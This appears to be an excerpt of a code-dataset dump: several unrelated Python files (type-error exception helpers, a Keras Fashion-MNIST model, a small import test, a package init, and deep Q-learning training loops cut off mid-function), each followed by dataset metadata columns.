        :type valueName: str
        :param correctTypes: Tuple of acceptable types; entries may be a type, a string, or None.
                             Type entries are rendered with their full names.
        :type correctTypes: typing.Tuple[typing.Union[type, str, None], ...]
        """
        if not isinstance(valueName, str):
            raise IncorrectTypeException(valueName, "valueName", (str,))

        if not isinstance(correctTypes, tuple):
            raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))

        if not correctTypes:
            raise Exception("This exception must receive at least one correct type.")

        # Each entry must itself be a type, a string, or None.
        for entryIndex, entry in enumerate(correctTypes):
            if entry is None or isinstance(entry, (type, str)):
                continue

            raise IncorrectTypeException(entry, "correctTypes[%d]" % entryIndex, (type, str, None))

        self._value = value  # type: typing.Any
        self._valueName = valueName  # type: str
        self._correctTypes = correctTypes  # type: tuple
        self._additional = additional  # type: typing.Tuple[typing.Any, ...]

        super().__init__(*(value, valueName, correctTypes, *additional))

    def __str__(self):
        return GetIncorrectTypeExceptionText(self._value, self._valueName, self._correctTypes, *self._additional)
class IncorrectReturnTypeException(Exception):
    """Raised when a callable returned a value of an unacceptable type.

    Stringifies to a message such as:
    "Expected 'function' to return a 'builtins.str' not 'builtins.int'."
    """

    def __init__(self, value, callableName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional):
        """
        :param value: The incorrectly typed return value; its full type name appears in the message.
        :param callableName: Describes what returned the incorrect value.
        :type callableName: str
        :param correctTypes: Tuple of acceptable types; entries may be a type, a string, or None.
                             Type entries are rendered with their full names.
        :type correctTypes: typing.Tuple[typing.Union[type, str, None], ...]
        """
        if not isinstance(callableName, str):
            raise IncorrectTypeException(callableName, "callableName", (str,))

        if not isinstance(correctTypes, tuple):
            raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))

        if not correctTypes:
            raise Exception("This exception must receive at least one correct type.")

        # Each entry must itself be a type, a string, or None.
        for entryIndex, entry in enumerate(correctTypes):
            if entry is None or isinstance(entry, (type, str)):
                continue

            raise IncorrectTypeException(entry, "correctTypes[%d]" % entryIndex, (type, str, None))

        self._value = value  # type: typing.Any
        self._callableName = callableName  # type: str
        self._correctTypes = correctTypes  # type: tuple
        self._additional = additional  # type: typing.Tuple[typing.Any, ...]

        super().__init__(*(value, callableName, correctTypes, *additional))

    def __str__(self):
        return GetIncorrectReturnTypeExceptionText(self._value, self._callableName, self._correctTypes, *self._additional)
class DoesNotInheritException(Exception):
    """Raised when a type fails to inherit from one of the required parents.

    Stringifies to a message such as: "Expected 'type' to inherit 'extender'."
    """

    def __init__(self, valueName: str, correctParents: typing.Tuple[typing.Union[type, str], ...], *additional):
        """
        :param valueName: Describes what failed to inherit correctly.
        :type valueName: str
        :param correctParents: Tuple of acceptable parents; entries may be a type or a string.
                               Type entries are rendered with their full names.
        :type correctParents: typing.Tuple[typing.Union[type, str], ...]
        """
        if not isinstance(valueName, str):
            raise IncorrectTypeException(valueName, "valueName", (str,))

        if not isinstance(correctParents, tuple):
            raise IncorrectTypeException(correctParents, "correctParents", (tuple,))

        if not correctParents:
            raise Exception("This exception must receive at least one correct parent.")

        # Each entry must itself be a type or a string (None is not allowed here).
        for entryIndex, entry in enumerate(correctParents):
            if isinstance(entry, (type, str)):
                continue

            raise IncorrectTypeException(entry, "correctParents[%d]" % entryIndex, (type, str))

        self._valueName = valueName  # type: str
        self._correctParents = correctParents  # type: tuple
        self._additional = additional  # type: typing.Tuple[typing.Any, ...]

        super().__init__(*(valueName, correctParents, *additional))

    def __str__(self):
        return GetDoesNotInheritExceptionText(self._valueName, self._correctParents, *self._additional)
class DummyException(Exception):
    """Placeholder exception type; carries no behavior of its own."""
def GetIncorrectTypeExceptionText(value, valueName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional) -> str:
    """Build the message text used by :class:`IncorrectTypeException`.

    :param value: The incorrectly typed value; its full type name appears in the message.
    :param valueName: Describes what was incorrectly typed.
    :param correctTypes: Tuple of acceptable types; entries may be a type, a string, or None.
    :param additional: Extra objects appended to the message, one per line.
    :return: Text such as "Expected type 'builtins.str' not 'builtins.int' for 'parameter 1'".
    """
    if not isinstance(valueName, str):
        raise IncorrectTypeException(valueName, "valueName", (str,))

    if not isinstance(correctTypes, tuple):
        raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))

    if not correctTypes:
        raise Exception("This exception must receive at least one correct type")

    for entryIndex, entry in enumerate(correctTypes):
        if entry is None or isinstance(entry, (type, str)):
            continue

        raise IncorrectTypeException(entry, "correctTypes[%d]" % entryIndex, (type, str, None))

    # "'{}'", "'{}' or '{}'", "'{}', '{}' or '{}'", ... depending on count.
    typeCount = len(correctTypes)
    correctString = "'{}'"

    if typeCount > 2:
        correctString += ", '{}'" * (typeCount - 2)

    if typeCount > 1:
        correctString += " or '{}'"

    formatList = list()

    for entry in correctTypes:
        if entry is None or isinstance(entry, type):
            formatList.append(Types.GetFullName(entry))
        elif isinstance(entry, str):
            formatList.append(entry)
        else:
            formatList.append("")

    formatList.append(Types.GetFullName(type(value)))
    formatList.append(valueName)

    exceptionString = ("Expected type " + correctString + " not '{}' for '{}'").format(*formatList)

    for additionalObject in additional:  # type: typing.Any
        exceptionString += "\n" + str(additionalObject)

    return exceptionString
def GetIncorrectReturnTypeExceptionText (value, callableName: str, correctTypes: typing.Tuple[typing.Union[type, str, None], ...], *additional) -> str:
    """Build the message text for a callable that returned a value of the wrong type.

    :param value: The offending return value; only its type appears in the message.
    :param callableName: The name of the callable, embedded in the message.
    :param correctTypes: Non-empty tuple of acceptable return types; each entry may
                         be a type, a string naming a type, or None.
    :param additional: Extra objects appended to the message, one per line.
    :return: The formatted message string.
    :raises IncorrectTypeException: If callableName is not a string, correctTypes is
                                    not a tuple, or an entry of correctTypes is invalid.
    :raises Exception: If correctTypes is empty.
    """
    if not isinstance(callableName, str):
        raise IncorrectTypeException(callableName, "callableName", (str,))
    if not isinstance(correctTypes, tuple):
        raise IncorrectTypeException(correctTypes, "correctTypes", (tuple,))
    if len(correctTypes) == 0:
        raise Exception("This exception must receive at least one correct type")
    for correctTypeIndex in range(len(correctTypes)):  # type: int
        if isinstance(correctTypes[correctTypeIndex], type):
            continue
        if isinstance(correctTypes[correctTypeIndex], str):
            continue
        if correctTypes[correctTypeIndex] is None:
            continue
        raise IncorrectTypeException(correctTypes[correctTypeIndex], "correctTypes[%d]" % correctTypeIndex, (type, str, None))
    valueType = type(value)
    correctString = "'{}'" + (", '{}'" * (len(correctTypes) - 2) if len(correctTypes) > 2 else "") + (" or '{}'" if len(correctTypes) > 1 else "")
    formatList = list()
    formatList.append(callableName)
    for correctTypeIndex in range(0, len(correctTypes)):
        if isinstance(correctTypes[correctTypeIndex], type) or correctTypes[correctTypeIndex] is None:
            formatList.append(Types.GetFullName(correctTypes[correctTypeIndex]))
        elif isinstance(correctTypes[correctTypeIndex], str):
            formatList.append(correctTypes[correctTypeIndex])
        else:
            formatList.append("")
    formatList.append(Types.GetFullName(valueType))
    # FIX: correctString already wraps each type name in single quotes. The previous
    # "to return a '" + correctString + "' not ..." wrapping doubled the quotes
    # (e.g. "to return a ''int''"), inconsistent with GetIncorrectTypeExceptionText
    # and GetDoesNotInheritExceptionText.
    exceptionString = ("Expected '{}' to return a " + correctString + " not '{}'.").format(*formatList)
    for additionalObject in additional:  # type: typing.Any
        exceptionString += "\n" + str(additionalObject)
    return exceptionString
def GetDoesNotInheritExceptionText (valueName: str, correctParents: typing.Tuple[typing.Union[type, str], ...], *additional) -> str:
    """Build the message text for a value that does not inherit a required parent.

    :param valueName: The name of the offending value, embedded in the message.
    :param correctParents: Non-empty tuple of required parents; each entry may be a
                           type, a string naming a type, or None.
    :param additional: Extra objects appended to the message, one per line.
    :return: The formatted message string.
    :raises IncorrectTypeException: If valueName is not a string, correctParents is
                                    not a tuple, or an entry of correctParents is invalid.
    :raises Exception: If correctParents is empty.
    """
    if not isinstance(valueName, str):
        raise IncorrectTypeException(valueName, "valueName", (str,))
    if not isinstance(correctParents, tuple):
        raise IncorrectTypeException(correctParents, "correctParents", (tuple,))
    if len(correctParents) == 0:
        raise Exception("This exception must receive at least one correct type")

    # Validate every entry up front: each must be a type, a string, or None.
    for parentIndex, correctParent in enumerate(correctParents):
        if not (isinstance(correctParent, (type, str)) or correctParent is None):
            raise IncorrectTypeException(correctParent, "correctParents[%d]" % parentIndex, (type, str, None))

    # Template grows as: "'{}'", "'{}' or '{}'", "'{}', '{}' or '{}'", ...
    parentTemplate = "'{}'"
    if len(correctParents) > 2:
        parentTemplate += ", '{}'" * (len(correctParents) - 2)
    if len(correctParents) > 1:
        parentTemplate += " or '{}'"

    formatArguments = [valueName]
    for correctParent in correctParents:
        if isinstance(correctParent, str):
            formatArguments.append(correctParent)
        elif isinstance(correctParent, type) or correctParent is None:
            formatArguments.append(Types.GetFullName(correctParent))
        else:
            formatArguments.append("")

    exceptionText = ("Expected '{}' to inherit " + parentTemplate).format(*formatArguments)
    for additionalObject in additional:  # type: typing.Any
        exceptionText += "\n" + str(additionalObject)

    return exceptionText
| 40.290441
| 151
| 0.747605
| 1,192
| 10,959
| 6.821309
| 0.100671
| 0.089534
| 0.025089
| 0.022138
| 0.84762
| 0.816628
| 0.790063
| 0.772599
| 0.772599
| 0.772599
| 0
| 0.00212
| 0.139338
| 10,959
| 271
| 152
| 40.439114
| 0.859945
| 0.197463
| 0
| 0.777778
| 0
| 0
| 0.081994
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.006173
| 0.018519
| 0.018519
| 0.135802
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58352ed7d67ded5afdaafc6da286a70db200c9c2
| 1,459
|
py
|
Python
|
fashion_mnist/model.py
|
lifeich1/play-tensorflow
|
b5396f0e3a1d2405db546570c2d6a50e7b65811f
|
[
"WTFPL"
] | null | null | null |
fashion_mnist/model.py
|
lifeich1/play-tensorflow
|
b5396f0e3a1d2405db546570c2d6a50e7b65811f
|
[
"WTFPL"
] | null | null | null |
fashion_mnist/model.py
|
lifeich1/play-tensorflow
|
b5396f0e3a1d2405db546570c2d6a50e7b65811f
|
[
"WTFPL"
] | null | null | null |
import tensorflow as tf

# Fashion-MNIST classifier: two Conv/BN/ReLU/MaxPool feature blocks followed by
# a batch-normalised fully-connected head with increasing dropout.
model = tf.keras.Sequential()

# Give the flat 28x28 input an explicit single channel for the conv layers.
model.add(tf.keras.layers.Reshape((28, 28, 1), input_shape=(28, 28, )))

# Convolutional feature extractor (BatchNormalization axis 3 = channel axis).
for filter_count in (32, 64):
    model.add(tf.keras.layers.Conv2D(filter_count, (5, 5)))
    model.add(tf.keras.layers.BatchNormalization(3))
    model.add(tf.keras.layers.Activation(tf.nn.relu))
    model.add(tf.keras.layers.MaxPool2D((2, 2, )))

model.add(tf.keras.layers.Flatten())

# Dense head: dropout rate grows with depth.
for unit_count, drop_rate in ((1024, 0.2), (512, 0.3), (512, 0.4), (512, 0.5)):
    model.add(tf.keras.layers.Dense(unit_count))
    model.add(tf.keras.layers.BatchNormalization())
    model.add(tf.keras.layers.Activation(tf.nn.relu))
    model.add(tf.keras.layers.Dropout(drop_rate))

# Ten-way softmax over the Fashion-MNIST classes; integer labels expected.
model.add(tf.keras.layers.Dense(10, activation=tf.nn.softmax))
model.compile(optimizer=tf.train.AdamOptimizer(),
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])
| 39.432432
| 71
| 0.747772
| 236
| 1,459
| 4.610169
| 0.186441
| 0.180147
| 0.248162
| 0.372243
| 0.819853
| 0.800551
| 0.719669
| 0.719669
| 0.719669
| 0.719669
| 0
| 0.036337
| 0.056888
| 1,459
| 36
| 72
| 40.527778
| 0.75436
| 0
| 0
| 0.53125
| 0
| 0
| 0.026749
| 0.021262
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5881edc44473e5047c72654f3ff197f821b68517
| 203
|
py
|
Python
|
tests/unit/test_yaml.py
|
didib/ansible-navigator
|
62fdbd05f25fb2d79133b3ab207f53ac2f2d6d36
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_yaml.py
|
didib/ansible-navigator
|
62fdbd05f25fb2d79133b3ab207f53ac2f2d6d36
|
[
"Apache-2.0"
] | 1
|
2022-02-04T02:38:15.000Z
|
2022-02-04T02:38:15.000Z
|
tests/unit/test_yaml.py
|
ganeshrn/ansible-navigator
|
1580b5e4a4d715fa4bb844bfeeb40f1ac8e628f6
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-11-17T09:45:18.000Z
|
2021-11-17T09:45:18.000Z
|
import ansible_navigator._yaml as yaml_import
def test_check_yaml_imports():
    """Ensure the yaml shim module resolved all of its expected attributes."""
    for attribute_name in ("yaml", "Dumper", "Loader"):
        assert getattr(yaml_import, attribute_name) is not None
| 25.375
| 45
| 0.793103
| 33
| 203
| 4.606061
| 0.454545
| 0.263158
| 0.315789
| 0.197368
| 0.328947
| 0.328947
| 0
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 203
| 7
| 46
| 29
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 1
| 0.2
| true
| 0
| 1
| 0
| 1.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
54492ed147e2710a37840384faea86e95db7ea06
| 130
|
py
|
Python
|
icevision/models/mmdet/common/bbox/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 580
|
2020-09-10T06:29:57.000Z
|
2022-03-29T19:34:54.000Z
|
icevision/models/mmdet/common/bbox/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 691
|
2020-09-05T03:08:34.000Z
|
2022-03-31T23:47:06.000Z
|
icevision/models/mmdet/common/bbox/fastai/__init__.py
|
lgvaz/mantisshrimp2
|
743cb7df0dae7eb1331fc2bb66fc9ca09db496cd
|
[
"Apache-2.0"
] | 105
|
2020-09-09T10:41:35.000Z
|
2022-03-25T17:16:49.000Z
|
from icevision.models.mmdet.common.bbox.fastai.callbacks import *
from icevision.models.mmdet.common.bbox.fastai.learner import *
| 43.333333
| 65
| 0.830769
| 18
| 130
| 6
| 0.555556
| 0.240741
| 0.351852
| 0.444444
| 0.740741
| 0.740741
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0.061538
| 130
| 2
| 66
| 65
| 0.885246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
544a77728e9243a262e6800217447c440e88823c
| 47,586
|
py
|
Python
|
tf_rl/common/train.py
|
Rowing0914/TF2_RL
|
c1b7f9b376cbecf01deb17f76f8e761035ed336a
|
[
"MIT"
] | 8
|
2020-01-13T03:29:50.000Z
|
2021-11-19T00:59:42.000Z
|
tf_rl/common/train.py
|
Rowing0914/TF2_RL
|
c1b7f9b376cbecf01deb17f76f8e761035ed336a
|
[
"MIT"
] | 5
|
2020-11-13T17:40:40.000Z
|
2022-03-12T00:11:33.000Z
|
tf_rl/common/train.py
|
Rowing0914/TF2_RL
|
c1b7f9b376cbecf01deb17f76f8e761035ed336a
|
[
"MIT"
] | 1
|
2021-04-02T13:42:39.000Z
|
2021-04-02T13:42:39.000Z
|
import time
from collections import deque
from tf_rl.common.utils import *
from tf_rl.common.visualise import visualise_act_and_dist
"""
===== Value Based Algorithm =====
TODO: think about incorporating PER's memory updating procedure into the model
so that, we can unify train_DQN and train_DQN_PER
"""
def train_DQN(agent, env, policy, replay_buffer, reward_buffer, summary_writer):
    """
    Training train_script for DQN and other advanced models without PER

    :param agent: learning agent exposing params, update(), eval_flg, manager,
                  target_model and main_model
    :param env: gym-style environment (reset/step/close)
    :param policy: exploration policy exposing select_action() and current_epsilon()
    :param replay_buffer: experience buffer exposing add() and sample()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(agent.params)
    time_buffer = list()  # per-episode wall-clock durations, flushed after each console log
    global_timestep = tf.compat.v1.train.get_global_step()
    log = logger(agent.params)
    # normaliser = RunningMeanStd(env.reset().shape[0])
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        for i in itertools.count():  # one iteration == one episode
            state = env.reset()
            total_reward = 0
            start = time.time()
            cnt_action = list()
            done = False
            while not done:
                # normaliser.update(state)
                # normaliser.normalise(state)
                action = policy.select_action(agent, state)
                next_state, reward, done, info = env.step(action)
                replay_buffer.add(state, action, reward, next_state, done)
                global_timestep.assign_add(1)
                total_reward += reward
                state = next_state
                cnt_action.append(action)
                # for evaluation purpose
                if global_timestep.numpy() % agent.params.eval_interval == 0:
                    agent.eval_flg = True
                # train the main model after the warm-up phase, once every train_interval steps
                if (global_timestep.numpy() > agent.params.learning_start) and (
                        global_timestep.numpy() % agent.params.train_interval == 0):
                    states, actions, rewards, next_states, dones = replay_buffer.sample(agent.params.batch_size)
                    loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
                # synchronise the target and main models by hard
                if (global_timestep.numpy() > agent.params.learning_start) and (
                        global_timestep.numpy() % agent.params.sync_freq == 0):
                    agent.manager.save()
                    agent.target_model.set_weights(agent.main_model.get_weights())
            """
            ===== After 1 Episode is Done =====
            """
            tf.summary.scalar("reward", total_reward, step=global_timestep.numpy())
            tf.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
            if i >= agent.params.reward_buffer_ep:
                tf.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
            tf.summary.histogram("taken actions", cnt_action, step=global_timestep.numpy())
            # store the episode reward
            reward_buffer.append(total_reward)
            time_buffer.append(time.time() - start)
            # console log once every reward_buffer_ep episodes (only after learning has started,
            # so `loss` is bound by then)
            if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
                log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss),
                            policy.current_epsilon(), cnt_action)
                time_buffer = list()
            if agent.eval_flg:
                eval_Agent(agent, env)
                agent.eval_flg = False
            # check the stopping condition
            if global_timestep.numpy() > agent.params.num_frames:
                print("=== Training is Done ===")
                eval_Agent(agent, env, n_trial=agent.params.test_episodes)
                env.close()
                break
def train_DQN_PER(agent, env, policy, replay_buffer, reward_buffer, Beta, summary_writer):
    """
    Training train_script for DQN with PER

    :param agent: learning agent exposing params, update(), eval_flg, manager,
                  target_model and main_model
    :param env: gym-style environment (reset/step/close)
    :param policy: exploration policy exposing select_action() and current_epsilon()
    :param replay_buffer: prioritised replay buffer exposing add(), sample() and
                          update_priorities()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param Beta: schedule for the PER importance-sampling exponent; invoked as Beta()
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_global_step()
    time_buffer = list()  # per-episode wall-clock durations, flushed after each console log
    log = logger(agent.params)
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            for i in itertools.count():  # one iteration == one episode
                state = env.reset()
                total_reward = 0
                start = time.time()
                cnt_action = list()
                done = False
                while not done:
                    action = policy.select_action(agent, state)
                    next_state, reward, done, info = env.step(action)
                    replay_buffer.add(state, action, reward, next_state, done)
                    global_timestep.assign_add(1)
                    total_reward += reward
                    state = next_state
                    cnt_action.append(action)
                    # for evaluation purpose
                    if global_timestep.numpy() % agent.params.eval_interval == 0:
                        agent.eval_flg = True
                    if (global_timestep.numpy() > agent.params.learning_start) and (
                            global_timestep.numpy() % agent.params.train_interval == 0):
                        # PER returns: state, action, reward, next_state, done, weights(a weight for an episode), indices(indices for a batch of episode)
                        states, actions, rewards, next_states, dones, weights, indices = replay_buffer.sample(
                            agent.params.batch_size, Beta().numpy())
                        loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
                        # add noise to the priorities
                        batch_loss = np.abs(batch_loss) + agent.params.prioritized_replay_noise
                        # Update a prioritised replay buffer using a batch of losses associated with each timestep
                        replay_buffer.update_priorities(indices, batch_loss)
                    # synchronise the target and main models by hard or soft update
                    if (global_timestep.numpy() > agent.params.learning_start) and (
                            global_timestep.numpy() % agent.params.sync_freq == 0):
                        agent.manager.save()
                        agent.target_model.set_weights(agent.main_model.get_weights())
                """
                ===== After 1 Episode is Done =====
                """
                tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
                tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
                if i >= agent.params.reward_buffer_ep:
                    tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
                tf.contrib.summary.histogram("taken actions", cnt_action, step=global_timestep.numpy())
                # store the episode reward
                reward_buffer.append(total_reward)
                time_buffer.append(time.time() - start)
                # console log once every reward_buffer_ep episodes (after learning has started)
                if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
                    log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss),
                                policy.current_epsilon(), cnt_action)
                    time_buffer = list()
                if agent.eval_flg:
                    eval_Agent(agent, env)
                    agent.eval_flg = False
                # check the stopping condition
                if global_timestep.numpy() > agent.params.num_frames:
                    print("=== Training is Done ===")
                    eval_Agent(agent, env, n_trial=agent.params.test_episodes)
                    env.close()
                    break
def pretrain_DQfD(expert, agent, env, policy, replay_buffer, reward_buffer, summary_writer, Beta):
    """
    Pre-training API for DQfD: https://arxiv.org/pdf/1704.03732.pdf

    The environment is driven by the expert's greedy action; the learner's own
    choice is stored alongside it in the replay buffer.

    :param expert: expert model; expert.predict(state) yields action scores (argmax taken)
    :param agent: learning agent exposing params, update(), eval_flg, manager,
                  target_model and main_model
    :param env: gym-style environment (reset/step/close)
    :param policy: exploration policy for the learner's candidate action
    :param replay_buffer: prioritised replay buffer exposing add(), sample() and
                          update_priorities()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param summary_writer: TensorBoard summary writer used as the logging context
    :param Beta: schedule for the PER importance-sampling exponent; read via Beta.get_value()
    :return: None
    """
    get_ready(agent.params)
    global_timestep = tf.compat.v1.train.get_global_step()
    time_buffer = list()  # per-episode wall-clock durations, flushed after each console log
    log = logger(agent.params)
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            for i in itertools.count():  # one iteration == one episode
                state = env.reset()
                total_reward = 0
                start = time.time()
                cnt_action = list()
                done = False
                while not done:
                    # expert action drives the environment; learner action is recorded with it
                    action_e = np.argmax(expert.predict(state))
                    action_l = policy.select_action(agent, state)
                    next_state, reward, done, info = env.step(action_e)
                    replay_buffer.add(state, [action_l, action_e], reward, next_state, done)
                    global_timestep.assign_add(1)
                    total_reward += reward
                    state = next_state
                    cnt_action.append(action_e)
                    # for evaluation purpose
                    if global_timestep.numpy() % agent.params.eval_interval == 0:
                        agent.eval_flg = True
                    if (global_timestep.numpy() > agent.params.learning_start) and (
                            global_timestep.numpy() % agent.params.train_interval == 0):
                        states, actions, rewards, next_states, dones, weights, indices = replay_buffer.sample(
                            agent.params.batch_size, Beta.get_value())
                        loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
                        # add noise to the priorities
                        batch_loss = np.abs(batch_loss) + agent.params.prioritized_replay_noise
                        # Update a prioritised replay buffer using a batch of losses associated with each timestep
                        replay_buffer.update_priorities(indices, batch_loss)
                    # synchronise the target and main models by hard or soft update
                    if (global_timestep.numpy() > agent.params.learning_start) and (
                            global_timestep.numpy() % agent.params.sync_freq == 0):
                        agent.manager.save()
                        agent.target_model.set_weights(agent.main_model.get_weights())
                """
                ===== After 1 Episode is Done =====
                """
                tf.contrib.summary.scalar("reward", total_reward, step=global_timestep.numpy())
                tf.contrib.summary.scalar("exec time", time.time() - start, step=global_timestep.numpy())
                if i >= agent.params.reward_buffer_ep:
                    tf.contrib.summary.scalar("Moving Ave Reward", np.mean(reward_buffer), step=global_timestep.numpy())
                tf.contrib.summary.histogram("taken actions", cnt_action, step=global_timestep.numpy())
                # store the episode reward
                reward_buffer.append(total_reward)
                time_buffer.append(time.time() - start)
                # console log once every reward_buffer_ep episodes (after learning has started)
                if global_timestep.numpy() > agent.params.learning_start and i % agent.params.reward_buffer_ep == 0:
                    log.logging(global_timestep.numpy(), i, np.sum(time_buffer), reward_buffer, np.mean(loss),
                                policy.current_epsilon(), cnt_action)
                    time_buffer = list()
                if agent.eval_flg:
                    eval_Agent(agent, env)
                    agent.eval_flg = False
                # check the stopping condition
                if global_timestep.numpy() > agent.params.num_frames:
                    print("=== Training is Done ===")
                    eval_Agent(agent, env, n_trial=agent.params.test_episodes)
                    env.close()
                    break
def train_DQN_afp(agent, expert, env, agent_policy, expert_policy, replay_buffer, reward_buffer, params,
                  summary_writer):
    """
    Training train_script for DQN with "ask-for-help" (AFP): if the learning agent's
    action signal is weak (<= 0.5) the expert's policy chooses the action instead.

    :param agent: learning agent exposing update(), manager, target_model/main_model
    :param expert: expert agent consulted when the learner is unsure
    :param env: gym-style environment (reset/step/close)
    :param agent_policy: policy producing the learner's candidate action
    :param expert_policy: policy producing the expert's action
    :param replay_buffer: experience buffer exposing add() and sample()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param params: hyper-parameter container
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(params)
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            # NOTE: unlike the other training loops, the timestep here is a plain int,
            # not a tf Variable — so it must never be dereferenced with .numpy().
            global_timestep = 0
            for i in itertools.count():
                state = env.reset()
                total_reward = 0
                start = time.time()
                cnt_action = list()
                agent_policy.index_episode = i
                agent.index_episode = i
                for t in itertools.count():
                    # env.render()
                    action = agent_policy.select_action(agent, state)
                    # where the AFP comes in
                    # if learning agent is not sure about his decision, then he asks for expert's help
                    if action <= 0.5:
                        action = expert_policy.select_action(expert, state)
                    next_state, reward, done, info = env.step(action)
                    replay_buffer.add(state, action, reward, next_state, done)
                    total_reward += reward
                    state = next_state
                    cnt_action.append(action)
                    global_timestep += 1
                    if (global_timestep > params.learning_start) and (global_timestep % params.train_interval == 0):
                        states, actions, rewards, next_states, dones = replay_buffer.sample(params.batch_size)
                        loss, batch_loss = agent.update(states, actions, rewards, next_states, dones)
                    # synchronise the target and main models by hard or soft update
                    if (global_timestep > params.learning_start) and (global_timestep % params.sync_freq == 0):
                        agent.manager.save()
                        if params.update_hard_or_soft == "hard":
                            agent.target_model.set_weights(agent.main_model.get_weights())
                        elif params.update_hard_or_soft == "soft":
                            soft_target_model_update_eager(agent.target_model, agent.main_model,
                                                           tau=params.soft_update_tau)
                    if done:
                        # BUGFIX: global_timestep is an int here; the original called
                        # global_timestep.numpy(), which raises AttributeError.
                        tf.contrib.summary.scalar("reward", total_reward, step=global_timestep)
                        # store the episode reward
                        reward_buffer.append(total_reward)
                        if global_timestep > params.learning_start:
                            try:
                                logging(global_timestep, params.num_frames, i, time.time() - start, total_reward,
                                        np.mean(loss), 0, cnt_action)
                            except Exception:  # best-effort logging; narrowed from a bare except
                                pass
                        break
                # check the stopping condition
                # if np.mean(reward_buffer) > params.goal or global_timestep > params.num_frames:
                if global_timestep > params.num_frames:  # BUGFIX: was global_timestep.numpy() on an int
                    print("GAME OVER!!")
                    env.close()
                    break
def train_DRQN(agent, env, policy, replay_buffer, reward_buffer, params, summary_writer):
    """
    Training train_script for DQN and other advanced models without PER

    Recurrent variant: whole episodes are stored in the replay buffer and fixed
    sub-sequences of 4 consecutive timesteps are sliced out for each update.

    :param agent: learning agent exposing update(), manager, target_model/main_model
    :param env: gym-style environment (reset/step/close); states reshaped to (1, 4)
                before action selection, so presumably a 4-dim observation space
                such as CartPole — TODO confirm
    :param policy: exploration policy exposing select_action() and current_epsilon()
    :param replay_buffer: episode-level buffer exposing add() and sample()
    :param reward_buffer: running buffer of episode rewards (appended to here)
    :param params: hyper-parameter container
    :param summary_writer: TensorBoard summary writer used as the logging context
    :return: None
    """
    get_ready(params)
    with summary_writer.as_default():
        # for summary purpose, we put all codes in this context
        with tf.contrib.summary.always_record_summaries():
            global_timestep = 0  # plain int counter, unlike the tf Variable used elsewhere
            for i in itertools.count():
                state = env.reset()
                total_reward = 0
                start = time.time()
